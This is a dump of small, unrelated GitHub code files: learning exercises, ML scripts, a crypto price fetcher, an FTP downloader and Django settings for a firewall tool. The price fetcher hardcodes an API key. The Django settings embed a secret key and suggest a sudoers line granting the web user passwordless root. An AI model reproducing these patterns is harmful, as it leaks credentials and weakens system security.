+{"seq_id":"73494709481","text":"#!/usr/bin/python3\n'''\nSimple compare script\n'''\n\n\ndef validate(number: str) -> bool:\n '''Validate entered number string is valid number'''\n if number == '':\n print('Error: number is empty')\n return False\n try:\n int(number)\n except ValueError as exp:\n print('Error: ', exp)\n return False\n return True\n\n\ndef read_number(prefix: str) -> int:\n '''Read number from the prompt'''\n while True:\n prompt = 'Enter ' + prefix + ' > '\n resp = input(prompt)\n if not validate(resp):\n continue\n number = int(resp)\n break\n return number\n\n\ndef compare(a: int, b: int) -> (str, int):\n '''\n Compare two numbers\n It returns 1 if a > b,\n returns 0 if a == b,\n returns -1 if a < b,\n returns 255 if unknown error\n '''\n if a > b:\n return '>', 1\n elif a == b:\n return '==', 0\n elif a < b:\n return '<', -1\n return 'Unknown error', 255\n\n\ndef introduction():\n '''Display introduction with example'''\n _, example1 = compare(5, 2)\n _, example2 = compare(2, 5)\n _, example3 = compare(3, 3)\n print('''\nPlease input two numbers. They will be compared and a number will be returned.\n\nExample:\na > b is {}\na < b is {}\na == b is {}\n \n '''.format(example1, example2, example3))\n\n\ndef main():\n '''Read numbers from user input, then compare them, and return result'''\n introduction()\n first = read_number('a')\n second = read_number('b')\n result_str, result_int = compare(first, second)\n if result_int == 255:\n print(result_str)\n return\n print('Result: {} {} {} is {}'.format(first, result_str, second,\n result_int))\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"BrightAdeGodson/submissions","sub_path":"CS1101/bool.py","file_name":"bool.py","file_ext":"py","file_size_in_byte":1767,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"11296327266","text":"from diffusers import DiffusionPipeline\n\npipeline = DiffusionPipeline.from_pretrained(\"{{model_path}}\")\n\n# self,\n# prompt: Union[str, List[str]] = None,\n# image: Union[torch.FloatTensor, PIL.Image.Image] = None,\n# mask_image: Union[torch.FloatTensor, PIL.Image.Image] = None,\n# strength: float = 0.8,\n# num_inference_steps: Optional[int] = 50,\n# guidance_scale: Optional[float] = 7.5,\n# negative_prompt: Optional[Union[str, List[str]]] = None,\n# num_images_per_prompt: Optional[int] = 1,\n# add_predicted_noise: Optional[bool] = False,\n# eta: Optional[float] = 0.0,\n# generator: Optional[Union[torch.Generator, List[torch.Generator]]] = None,\n# prompt_embeds: Optional[torch.FloatTensor] = None,\n# negative_prompt_embeds: Optional[torch.FloatTensor] = None,\n# output_type: Optional[str] = \"pil\",\n# return_dict: bool = True,\n# callback: Optional[Callable[[int, int, torch.FloatTensor], None]] = None,\n# callback_steps: int = 1,\n\nimages = pipeline(\n prompt=\"{{prompts}}\",\n negative_prompt=\"{{negative_prompt}}\",\n num_inference_steps={{steps}},\n num_images_per_prompt={{batch_size}},\n).images\n\nfor i in range(len(images)):\n images[i].save(\"{{workspace_path}}/outputs/image_%d.png\" % (i))\n","repo_name":"rrkeji/rrai-desktop-sdk","sub_path":"plugins/tauri-plugin-rrai-ability/src/abilities/stable_diffusion/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1270,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"35751181651","text":"matrix = [[int(input(f\"Number for [{n}x{num}]: \")) for num in range(3)] for n in range(3)]\nind = len(matrix)\nfor line in matrix:\n ind -= 1\n for n, col in enumerate(line):\n if n >= ind:\n print(col, end=\" \")\n else:\n print(\" \", end=\" \")\n print(\"\")\n","repo_name":"LBarros77/Python","sub_path":"exercices/questao03.py","file_name":"questao03.py","file_ext":"py","file_size_in_byte":290,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"10474050749","text":"import csv, spacy, os, sys, nltk, re, pickle, 
html\nsys.path.append(\"/home/abravo/PycharmProjects/IberLEF2019\")\n\nimport xml.etree.ElementTree as ET\nfrom random import shuffle\n\nfrom spacymoji import Emoji\nimport numpy as np\n\nfrom utils.utils import preprocess_tweet, get_word_index, write_word_index, save_obj, load_obj, get_embedding_matrix, \\\n get_spacy_nlp, get_task_data_for_class_task, EMBEDDING_CHAR, create_data_comb, get_task_data_for_class_task_haha\n\n\ndef train2txt(train_path, output_path):\n\n ofile = open(output_path, \"w\")\n\n with open(train_path) as csv_file:\n csv_reader = csv.reader(csv_file, delimiter=',')\n for row in csv_reader:\n row[1] = row[1].replace(\"\\n\", \" \")\n ofile.write(\"\\t\".join(row) + \"\\n\")\n\n ofile.close()\n\n\n\nif __name__ == '__main__':\n\n train_path = \"/home/upf/corpora/IberLEF2019/HAHA/haha_2019_train.csv\"\n\n output_path = \"/home/upf/corpora/IberLEF2019/HAHA/preprocessed_data\"\n\n preproc_train_path = os.path.join(output_path, \"haha_2019_train.txt\")\n\n #train2txt(train_path, preproc_train_path)\n\n test_path = \"/home/upf/corpora/IberLEF2019/HAHA/haha_2019_test.csv\"\n\n preproc_test_path = os.path.join(output_path, \"haha_2019_test.txt\")\n\n #train2txt(test_path, preproc_test_path)\n\n\n\n comb_path = os.path.join(output_path, \"haha_2019_train_test.txt\")\n #create_data_comb([preproc_train_path, preproc_test_path], True, comb_path)\n\n\n SAVE_WORD_INDEX = False\n SAVE_CHAR_INDEX = False\n SAVE_EMB_MATRIX = False\n SAVE_DATA = True\n SAVE_CHAR_DATA = False\n\n nlp = None\n\n tweet_col= 1\n label_col= 2\n\n\n\n if SAVE_WORD_INDEX:\n if not nlp:\n nlp = get_spacy_nlp('es_core_news_md', True)\n all_files = [preproc_train_path, preproc_test_path]\n\n word_index = get_word_index(nlp, all_files, True, 1)\n word_index_all_path = os.path.join(output_path, \"word_index_all.txt\")\n write_word_index(word_index, word_index_all_path)\n\n word_index_all_path = os.path.join(output_path, \"word_index_all.pkl\")\n save_obj(word_index, word_index_all_path)\n\n word_index_path = os.path.join(output_path, \"word_index_all.pkl\")\n word_index = load_obj(word_index_path)\n\n\n\n if SAVE_CHAR_INDEX:\n if not nlp:\n nlp = get_spacy_nlp('es_core_news_md', True)\n\n all_files = [preproc_train_path]\n\n char_index = get_word_index(nlp, all_files, True, tweet_col, True)\n char_index_all_path = os.path.join(output_path, \"char_index_train.txt\")\n write_word_index(char_index, char_index_all_path)\n char_index_all_path = os.path.join(output_path, \"char_index_train.pkl\")\n save_obj(char_index, char_index_all_path)\n print(\"CHAR INDEX PROCESSED!\")\n\n #char_index_path = os.path.join(output_path, \"char_index_train.pkl\")\n #char_index = load_obj(char_index_path)\n\n\n if SAVE_DATA:\n if not nlp:\n nlp = get_spacy_nlp('es_core_news_md', True)\n\n data, labels, scores = get_task_data_for_class_task_haha(nlp, word_index, preproc_train_path, True, True, tweet_col, [2,-1], False)\n data_path = os.path.join(output_path, \"data_train.pkl\")\n labels_path = os.path.join(output_path, \"labels_train.pkl\")\n scores_path = os.path.join(output_path, \"scores_train.pkl\")\n save_obj(data, data_path)\n save_obj(labels, labels_path)\n save_obj(scores, scores_path)\n\n data, labels, scores = get_task_data_for_class_task_haha(nlp, word_index, preproc_test_path, True, False, tweet_col,\n None, False)\n data_path = os.path.join(output_path, \"data_test.pkl\")\n save_obj(data, data_path)\n\n\n if SAVE_CHAR_DATA:\n if not nlp:\n nlp = get_spacy_nlp('es_core_news_md', True)\n\n data, labels = 
get_task_data_for_class_task(nlp, char_index, preproc_train_path, True, True, tweet_col, label_col, True)\n data_path = os.path.join(output_path, \"char_data_train.pkl\")\n save_obj(data, data_path)\n","repo_name":"abravo84/IberLEF2019","sub_path":"HAHA/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":4038,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"10655959314","text":"import torch\r\nimport torchvision\r\nimport torch.optim\r\nimport wave_u_net as model\r\nimport numpy as np\r\nimport torch.nn as nn\r\nfrom PIL import Image\r\nimport glob\r\nimport time,os\r\n\r\n\r\ndef dehaze_image( image_depth_path,image_hazy_path,Id,spath,pth_path):\r\n\r\n print(image_hazy_path,image_depth_path)\r\n img_hazy = Image.open(image_hazy_path)\r\n img_depth = Image.open(image_depth_path)\r\n\r\n img_hazy = img_hazy.resize((640,480), Image.ANTIALIAS)\r\n\r\n img_depth = img_depth.resize((640,480), Image.ANTIALIAS)\r\n\r\n\r\n img_hazy = (np.asarray(img_hazy) / 255.0)\r\n\r\n img_depth = (np.asarray(img_depth) / 255.0)\r\n\r\n img_hazy = torch.from_numpy(img_hazy).float().permute(2, 0, 1).cuda().unsqueeze(0)\r\n img_depth = torch.from_numpy(img_depth).float().cuda().unsqueeze(0).unsqueeze(0)\r\n \r\n dehaze_net = model.LAST_U_net()\r\n dehaze_net = nn.DataParallel(dehaze_net).cuda()\r\n\r\n dehaze_net.load_state_dict(torch.load(pth_path))\r\n \r\n clean_image = dehaze_net(img_depth,img_hazy)\r\n\r\n temp_tensor = (clean_image,0)\r\n index = image_depth_path.split('/')[-1]\r\n \r\n #torchvision.utils.save_image(torch.cat((img_hazy,clean_image),0), \"test_result/real/%s/%s\" % (s,index))\r\n\r\n torchvision.utils.save_image(clean_image, \"test_result/outdoor/%s/%s\" % (spath,index))\r\n\r\nif __name__ == '__main__':\r\n os.environ['CUDA_VISIBLE_DEVICES'] = '0'\r\n spath = 'outdoor'\r\n pth_path = '/home/amax/share/FGD/U-Net/trained_model/outdoor/MCDN.pth'\r\n depth_list = glob.glob(r\"dataset/test set/%s/depth/*\" % spath)\r\n hazy_list = glob.glob(r\"dataset/test set/%s/hazy/*\" % spath)\r\n\r\n for Id in range(len(depth_list)):\r\n dehaze_image(depth_list[Id],hazy_list[Id],Id,spath,pth_path)\r\n print(depth_list[Id], \"done!\")\r\n \r\n","repo_name":"CCECfgd/MSCDN-master","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1759,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"18"} +{"seq_id":"24348139918","text":"import random\n\ntext_str = input(\"Type the text to be scrambled and hit enter:\")\nprint(text_str)\n\n#split string by the space character into a list\nwords = text_str.split()\n\n#iterate over all words in the list and scramble each of them\n#don't forget to check for punctuation marks\n#(strings are immutable, so each word is rebuilt from a shuffled character list)\nj = 0\nresult = \"\"\n\n#Goes through each word in the list\nwhile j < len(words):\n word = words[j]\n if len(word) > 3:\n #shuffle only the inner letters, keeping the first and last in place\n middle = [*word[1:-1]]\n random.shuffle(middle)\n word = word[0] + ''.join(middle) + word[-1]\n result = result + word + \" \"\n j = j + 1\n\n#print the text with scrambled words\nprint(result.strip())\n","repo_name":"c18441084/Python","sub_path":"scrambleletters.py","file_name":"scrambleletters.py","file_ext":"py","file_size_in_byte":895,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
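# The header comment in the scrambler above flags punctuation but the code
# never handles it; a sketch of one way to keep trailing punctuation in place
# (an extension, not part of the original exercise).
import random
import string

def scramble_keep_punct(word):
    core = word.rstrip(string.punctuation)   # e.g. 'scrambled!' -> 'scrambled'
    tail = word[len(core):]
    if len(core) > 3:
        middle = [*core[1:-1]]
        random.shuffle(middle)
        core = core[0] + ''.join(middle) + core[-1]
    return core + tail

print(scramble_keep_punct("scrambled!"))  # e.g. 'sacmrbled!'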
words\n\n","repo_name":"c18441084/Python","sub_path":"scrambleletters.py","file_name":"scrambleletters.py","file_ext":"py","file_size_in_byte":895,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"28835525288","text":"# Runs test to check if input states are normalised\nimport numpy as np\nimport strawberryfields as sf\nimport tensorflow as tf\nfrom strawberryfields.ops import Sgate, Dgate, Vgate\n\ndef test_truncations(states, truncations=[10, 15, 20]):\n batch_size = states.shape[0]\n\n x = tf.placeholder(tf.complex64, shape=[batch_size, 3])\n\n eng, q = sf.Engine(1)\n with eng:\n Sgate(x[:, 0]) | q[0]\n Dgate(x[:, 1]) | q[0]\n Vgate(x[:, 2]) | q[0]\n\n sess = tf.Session()\n sess.run(tf.global_variables_initializer())\n\n traces = np.zeros([batch_size, len(truncations)])\n for n in range(len(truncations)):\n state = eng.run('tf', eval=False, batch_size=batch_size, cutoff_dim=truncations[n])\n trace = tf.real(state.trace())\n\n traces[:, n] = sess.run(trace, feed_dict={\n x: states\n })\n print(\"Evaluated T={}\".format(truncations[n]))\n\n import matplotlib.pyplot as plt\n for n in range(len(truncations)):\n plt.subplot(len(truncations), 1, n+1)\n plt.hist(traces[:, n], bins=25)\n plt.xlabel(\"Trace\")\n plt.ylabel(\"Frequency\")\n plt.ylim([0, batch_size])\n plt.show()\n\nif __name__ == '__main__':\n f = np.load('data/states.npz')\n state_params = f['states']\n test_truncations(state_params)\n","repo_name":"lewis-od/QNN","sub_path":"state_classifier/test_truncation.py","file_name":"test_truncation.py","file_ext":"py","file_size_in_byte":1296,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"18"} +{"seq_id":"3709424365","text":"import requests\nfrom requests.exceptions import ConnectionError, Timeout, TooManyRedirects\n\n\nmyApiKey = '6632c734-36fa-4a69-821f-8b7e26e3566f'\n\nparams = {\n 'start':'1',\n 'limit':'10',\n 'convert':'USD'\n}\n\nurl = 'https://pro-api.coinmarketcap.com/v1/cryptocurrency/listings/latest'\n\nheaders = {\n 'Accepts': 'application/json',\n 'X-CMC_PRO_API_KEY': '{}'.format(myApiKey)\n}\n\n\ntry:\n response = requests.get(url, params=params, headers=headers)\n data = response.json()\n mydata = data['data']\n print(\"Top 10 coins\\n\")\n for coins in mydata:\n print(f\"{coins['name']} | Price: {round(coins['quote']['USD']['price'], 2)} | 24hr change: {round(coins['quote']['USD']['percent_change_24h'], 2)}%\" )\n \nexcept (ConnectionError, Timeout, TooManyRedirects) as e:\n print(e)\n\ninput(\"Press enter to exit.\")\n\n\n","repo_name":"ErickLee85/Python-Projects","sub_path":"Crypto/crypto.py","file_name":"crypto.py","file_ext":"py","file_size_in_byte":817,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"71303064040","text":"# Taken from https://github.com/finegrain-ai/refiners\n# LICENSE: MIT\n\nimport os\n\nif __name__ == \"__main__\":\n\n from refiners.foundationals.latent_diffusion import StableDiffusion_1\n from refiners.foundationals.latent_diffusion.lora import LoraWeights\n from refiners.fluxion.utils import load_from_safetensors, manual_seed\n import torch\n\n sd15 = StableDiffusion_1(device=\"cuda\")\n sd15.clip_text_encoder.load_state_dict(load_from_safetensors(\"CLIPTextEncoderL.safetensors\"))\n sd15.lda.load_state_dict(load_from_safetensors(\"lda.safetensors\"))\n sd15.unet.load_state_dict(load_from_safetensors(\"unet.safetensors\"))\n\n # This uses the LoraAdapter internally and takes care 
to inject it where it should\n lora_weights = LoraWeights(\"pokemon_lora.safetensors\", device=sd15.device)\n lora_weights.patch(sd15, scale=1.0)\n\n x=os.environ.get('CM_REFINERS_PROMPT','')\n prompt = \"a cute cat\" if x=='' else x\n\n with torch.no_grad():\n clip_text_embedding = sd15.compute_text_embedding(prompt)\n\n sd15.set_num_inference_steps(30)\n\n manual_seed(2)\n x = torch.randn(1, 4, 64, 64, device=sd15.device)\n\n output=os.environ['CM_REFINERS_OUTPUT_FILE']\n\n with torch.no_grad():\n for step in sd15.steps:\n x = sd15(\n x,\n step=step,\n clip_text_embedding=clip_text_embedding,\n condition_scale=7.5,\n )\n predicted_image = sd15.lda.decode_latents(x)\n predicted_image.save(output)\n\n exit(0)","repo_name":"cknowledge/cm-reproduce","sub_path":"script/run-refiners-hello-world/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1522,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"36923994831","text":"from collections import Counter\n\n\ndef part_1(entries):\n valid = 0\n for mini, maxi, letter, pw in entries:\n if mini <= Counter(pw)[letter] <= maxi:\n valid += 1\n\n return valid\n\n\ndef part_2(entries):\n valid = 0\n for mini, maxi, letter, pw in entries:\n\n if Counter(pw[mini - 1] + pw[maxi - 1])[letter] == 1:\n valid += 1\n\n return valid\n\n\ndef main(puzzle_input_f):\n lines = [l.strip() for l in puzzle_input_f.readlines() if l]\n\n entries = []\n for l in lines:\n rule, letter, pw = l.split(\" \")\n mini, maxi = rule.split(\"-\")\n mini = int(mini)\n maxi = int(maxi)\n\n letter = letter.replace(\":\", \"\")\n entries.append((mini, maxi, letter, pw))\n\n print(\"Part 1: \", part_1(entries))\n print(\"Part 2: \", part_2(entries))\n\n\nif __name__ == \"__main__\":\n import os\n from aocpy import input_cli\n\n base_dir = os.path.dirname(__file__)\n with input_cli(base_dir) as f:\n main(f)\n","repo_name":"eruvanos/2020_AOC","sub_path":"02/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":981,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"17679810076","text":"from tkinter import *\nfrom tkinter import messagebox\n\nroot = Tk()\nroot.title('Simple Calculator')\n\ndef show_info():\n\tresponse = messagebox.showinfo(\"Showinfo\", \"Info goes here\")\n\tif response == \"ok\":\n\t\tLabel(root, text=\"You clicked ok ('ok')\").pack()\n\ndef show_warning():\n\tresponse = messagebox.showwarning(\"Showwarning\", \"Warning goes here\")\n\tif response == \"ok\":\n\t\tLabel(root, text=\"You clicked ok ('ok')\").pack()\n\ndef show_error():\n\tresponse = messagebox.showerror(\"Showerror\", \"Error goes here\")\n\tif response == \"ok\":\n\t\tLabel(root, text=\"You clicked ok ('ok')\").pack()\n\ndef ask_question():\n\tresponse = messagebox.askquestion(\"Askquestion\", \"Question goes here\")\n\tif response == \"yes\":\n\t\tLabel(root, text=\"You clicked yes ('yes')\").pack()\n\telif response == \"no\":\n\t\tLabel(root, text=\"You clicked no ('no')\").pack()\n\ndef ask_okcancel():\n\tresponse = messagebox.askokcancel(\"Askokcancel\", \"Question goes here\")\n\tif response == 1:\n\t\tLabel(root, text=\"You clicked ok (1)\").pack()\n\telif response == 0:\n\t\tLabel(root, text=\"You clicked cancel (0)\").pack()\n\ndef ask_yesno():\n\tresponse = messagebox.askyesno(\"Askyesno\", \"Question goes here\")\n\tif response == 1:\n\t\tLabel(root, text=\"You clicked yes (1)\").pack()\n\telif response == 0:\n\t\tLabel(root, text=\"You 
clicked no (0)\").pack()\n\n\nButton(root, text=\"showinfo\", command=show_info).pack()\nButton(root, text=\"showwarning\", command=show_warning).pack()\nButton(root, text=\"showerror\", command=show_error).pack()\nButton(root, text=\"askquestion\", command=ask_question).pack()\nButton(root, text=\"askokcancel\", command=ask_okcancel).pack()\nButton(root, text=\"askyesno\", command=ask_yesno).pack()\n\n\nroot.mainloop()","repo_name":"DocMcFlop/RocketProject","sub_path":"tests/tkinter_messagebox.py","file_name":"tkinter_messagebox.py","file_ext":"py","file_size_in_byte":1646,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"}
+{"seq_id":"33639155051","text":"fr = None\ntry:\n    file_name = raw_input(\"enter filename : \")\n    #opening file in read mode\n    fr = open(file_name)\n    lines = fr.readlines()\n    balance = float(lines[2])\n    no = int(raw_input(\"enter no of persons to divide : \"))\n    rs = balance/no\n    print(\"rs per person is : %0.2f rs\" %rs)\n    print(\"task done\")\nexcept Exception as ex:\n    #action code\n    print(type(ex), \" : \", ex)\nfinally:\n    #code to release resource\n    if fr:\n        fr.close()\n        print(\"file closed\")\nprint(\"all is well\")\n","repo_name":"kajal241199/PYTraining","sub_path":"finaly/f1.py","file_name":"f1.py","file_ext":"py","file_size_in_byte":514,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"8105018688","text":"from collections import deque\ndef solution(bridge_length, weight, truck_weights):\n    answer = 0\n    time = 0\n    s = deque()\n    tw = deque(truck_weights)\n    bw = 0\n    \n    while len(tw) > 0 or len(s) > 0:\n        if len(s) != 0 and s[0][1] == time - bridge_length:\n            a, b = s.popleft()\n            bw -= a\n        if len(tw) != 0 and (bw + tw[0]) <= weight:\n            bw += tw[0]\n            truck = tw.popleft()\n            s.append((truck, time))\n        \n        time += 1\n    return time","repo_name":"jisuncho/Programmers-code","sub_path":"42583.py","file_name":"42583.py","file_ext":"py","file_size_in_byte":511,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"9781824884","text":"#!/usr/bin/python3\n\n# This program is used to download files from the internet\n# over the ftp protocol\n\n# ::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::\n\nimport ftplib\nimport os\nimport socket\n\n# ::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::\n\nHOST = 'ftp.byfly.by'\nDIRN = 'ubuntu'\nFILE = 'ls-lR.gz'\n\n\ndef main():\n\ttry:\n\t\tf = ftplib.FTP(HOST)\n\texcept (socket.error, socket.gaierror) as e:\n\t\tprint('ERROR: cannot reach \"{}\"'.format(HOST))\n\t\treturn\n\tprint('*** Connected to host \"{}\"'.format(HOST))\n\n\ttry:\n\t\tf.login()\n\texcept ftplib.error_perm:\n\t\tprint('ERROR: cannot login anonymously')\n\t\tf.quit()\n\t\treturn\n\tprint('*** Logged in as \"anonymous\"')\n\n\ttry:\n\t\tf.cwd(DIRN)\n\texcept ftplib.error_perm:\n\t\tprint('ERROR: cannot CD to \"{}\" folder'.format(DIRN))\n\t\tf.quit()\n\t\treturn\n\tprint('*** Changed to \"{}\" folder'.format(DIRN))\n\n\ttry:\n\t\tloc = open(FILE, 'wb')\n\t\tf.retrbinary('RETR {}'.format(FILE), loc.write)\n\t\tloc.close()\n\texcept ftplib.error_perm:\n\t\tprint('ERROR: cannot read file \"{}\" to CWD'.format(FILE))\n\t\tos.unlink(FILE)\n\telse:\n\t\tprint('*** Downloaded \"{}\" to CWD'.format(FILE))\n\n\tf.quit()\n\treturn\n\n\n# ::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::\n\nif __name__ == 
'__main__':\n\tmain()","repo_name":"volitilov/Python_learn","sub_path":"programs/medium_prog/ftp_downloader/ftp_downloader.py","file_name":"ftp_downloader.py","file_ext":"py","file_size_in_byte":1281,"program_lang":"python","lang":"ru","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"}
+{"seq_id":"9040447442","text":"# -*- coding: utf-8 -*-\nimport os\nPROJECT_ROOT_PATH = os.path.dirname(os.path.abspath(__file__))\nJOIN = os.path.join\n\n\nDEBUG = True\nTEMPLATE_DEBUG = DEBUG\n\nADMINS = (\n    ('Gustavo Henrique', 'gustavo@gustavohenrique.net'),\n)\n\nMANAGERS = ADMINS\n\nDATABASE_ENGINE = 'sqlite3'\nDATABASE_NAME = JOIN(PROJECT_ROOT_PATH, 'database.db')\nDATABASE_USER = '' # Not used with sqlite3.\nDATABASE_PASSWORD = '' # Not used with sqlite3.\nDATABASE_HOST = '' # Set to empty string for localhost. Not used with sqlite3.\nDATABASE_PORT = '' # Set to empty string for default. Not used with sqlite3.\n\nTIME_ZONE = 'America/Sao_Paulo'\nLANGUAGE_CODE = 'pt-br'\nSITE_ID = 1\nUSE_I18N = False\nMEDIA_ROOT = JOIN(PROJECT_ROOT_PATH, 'media')\nMEDIA_URL = '/media/'\nADMIN_MEDIA_PREFIX = '/media/admin/'\nSECRET_KEY = 'alwto1ine4o@qjpe&e@6$@$i*wl+hixjumnh$^+$$3r(hhi53g'\nTEMPLATE_LOADERS = (\n    'django.template.loaders.filesystem.load_template_source',\n    'django.template.loaders.app_directories.load_template_source',\n)\nMIDDLEWARE_CLASSES = (\n    'django.middleware.common.CommonMiddleware',\n    'django.contrib.sessions.middleware.SessionMiddleware',\n    'django.contrib.auth.middleware.AuthenticationMiddleware',\n)\nROOT_URLCONF = 'bandcontrol.urls'\nTEMPLATE_DIRS = (\n    JOIN(PROJECT_ROOT_PATH, 'templates')\n)\n\nINSTALLED_APPS = (\n    'django.contrib.auth',\n    'django.contrib.contenttypes',\n    'django.contrib.sessions',\n    'django.contrib.sites',\n    'django.contrib.admin',\n\n    'rede',\n    'cliente',\n)\n\n\"\"\"\nSudo configuration\n\nSudo is a program that lets a user run commands as root.\nThe user running the web server must be added to the\n/etc/sudoers file, defining which commands it may run as\nroot.\nBelow is an example of how to configure /etc/sudoers\n\n# user www-data may run any command as root without a password\nwww-data ALL=(ALL) NOPASSWD: ALL\n\n# user www-data may run only the iptables, arp and ping commands\nCmnd_Alias COMANDOS = /usr/sbin/iptables, /usr/sbin/arp, /usr/bin/ping\nwww-data ALL=(ALL) NOPASSWD: COMANDOS\n\"\"\"\n\n# Directory containing the bandwidth control and firewall scripts\nSHELL_SCRIPT_DIR = JOIN(PROJECT_ROOT_PATH, 'scripts')\n\n# Path to the text file\nFIREWALL_TXT_FILE = '%s/pontosderede.txt' % SHELL_SCRIPT_DIR\n\n# Firewall\nFIREWALL_SCRIPT = '%s/firewall' % SHELL_SCRIPT_DIR\n\n# ARP to list connected IPs\nARP_COMMAND = '/usr/sbin/arp -n | grep -iv incomplet | grep -iv address | grep -iv eth0 | sort'\n\n","repo_name":"gustavohenrique/bandcontrol","sub_path":"settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":2525,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"}
+{"seq_id":"31089680656","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n##\n# bsf_decomp.py: Decomposes binary symplectic matrices into circuits.\n##\n# © 2012 Christopher E. 
Granade (cgranade@gmail.com) and\n# Ben Criger (bcriger@gmail.com).\n# This file is a part of the QuaEC project.\n# Licensed under the AGPL version 3.\n##\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU Affero General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU Affero General Public License for more details.\n#\n# You should have received a copy of the GNU Affero General Public License\n# along with this program. If not, see <http://www.gnu.org/licenses/>.\n##\n\n## IMPORTS ##\nfrom sys import version_info\nif version_info[0] == 3:\n    PY3 = True\n    from importlib import reload\nelif version_info[0] == 2:\n    PY3 = False\nelse:\n    raise EnvironmentError(\"sys.version_info refers to a version of \"\n                           \"Python neither 2 nor 3. This is not permitted. \"\n                           \"sys.version_info = {}\".format(version_info))\n\nimport itertools\nimport string\nimport numpy as np\n\nif PY3:\n    from .exceptions import *\n    from . import PauliClass as pc\n    from . import CliffordClass as cc\n    from . import bsf\n    from . import utils as u\nelse:\n    from exceptions import *\n    import PauliClass as pc\n    import CliffordClass as cc\n    import bsf\n    import utils as u\n\n## FUNCTIONS ##\n\ndef next1(arr):\n    idx_1s = np.nonzero(arr)\n    if len(idx_1s[0]) == 0:\n        return None\n    else:\n        return np.min(idx_1s)\n\ndef circuit_decomposition_part1(bsm):\n    \n    left_gateseq = []\n    right_gateseq = []\n    \n    for pivot in range(bsm.nq):\n        \n        ## PROCEDURE 6.5 ##\n        \n        # STEP 1. Use left multiplication by H and SWAP to move a 1 to the\n        # upper-left corner.\n        if bsm[pivot, pivot] != 1:\n            # Find which row has the 1 in the pivot column.\n            idx_pivot1 = next1(bsm[:, pivot])\n            \n            # If the length of idx_pivot is 0, then we got the empty list,\n            # indicating a rank deficiency.\n            if idx_pivot1 is None:\n                raise RankDeficientError(\"The input binary symplectic matrix must be full-rank.\")\n            \n            # If we're still here, then we need to move the 1. We start by moving\n            # it to the XX block if needed.\n            if idx_pivot1 >= bsm.nq:\n                idx_pivot1 -= bsm.nq\n                left_gateseq.append((\"H\", idx_pivot1))\n                bsm.left_H(idx_pivot1)\n            \n            # We can now assume that the 1 is in the XX block, so we move it\n            # to the right row of that block with a left SWAP.\n            if idx_pivot1 != pivot:\n                left_gateseq.append((\"SWAP\", pivot, idx_pivot1))\n                bsm.left_SWAP(pivot, idx_pivot1)\n\n        assert bsm[pivot, pivot] == 1, \"Pivot element not correctly set.\"\n        \n        # STEP 2. Do column reduction on the pivot column of XX, using left CNOT\n        # to eliminate any other 1s in that column.\n        while True:\n            idx_next_1 = next1(bsm.xx[pivot+1:, pivot])\n            if idx_next_1 is None:\n                break\n            else:\n                idx_next_1 += pivot + 1\n            \n            left_gateseq.append((\"CNOT\", pivot, idx_next_1))\n            bsm.left_CNOT(pivot, idx_next_1)\n            \n        \n        # STEP 3. Do row reduction on the pivot row of XX, using right CNOT to\n        # eliminate any other 1s in that row.\n        while True:\n            idx_next_1 = next1(bsm.xx[pivot, pivot+1:])\n            if idx_next_1 is None:\n                break\n            else:\n                idx_next_1 += pivot + 1\n            \n            right_gateseq.append((\"CNOT\", idx_next_1, pivot))\n            bsm.right_CNOT(idx_next_1, pivot)\n            \n        \n        # STEP 4. 
Use left multiplication by R_pi/4 and CZ to column eliminate\n        # the pivot column of ZX.\n        while True:\n            idx_next_1 = next1(bsm.zx[:, pivot])\n            \n            if idx_next_1 is None:\n                break            \n            if idx_next_1 == pivot:\n                left_gateseq.append((\"R_pi4\", pivot))\n                bsm.left_R_pi4(pivot)\n            else:\n                left_gateseq.append((\"CZ\", pivot, idx_next_1))\n                bsm.left_CZ(pivot, idx_next_1)\n        \n        # STEPS 5-6. Repeat Steps 1 to 4 for pivot += 1.\n        # This is taken care of by the loop above.\n        \n    # STEP 8.\n    bsm.right_H_all()\n    # STEP 9. Right multiply by R_pi/4 to eliminate the diagonal of A, and right multiply by CZ to eliminate its off-diagonal 1s.\n    # Since B=C=I, and A is symmetric, we can loop over the lower triangular part and the diagonal:\n\n    gateseq_8910=[]\n    Hs_on=set([])\n    for idx_r in range(bsm.nq):\n        if 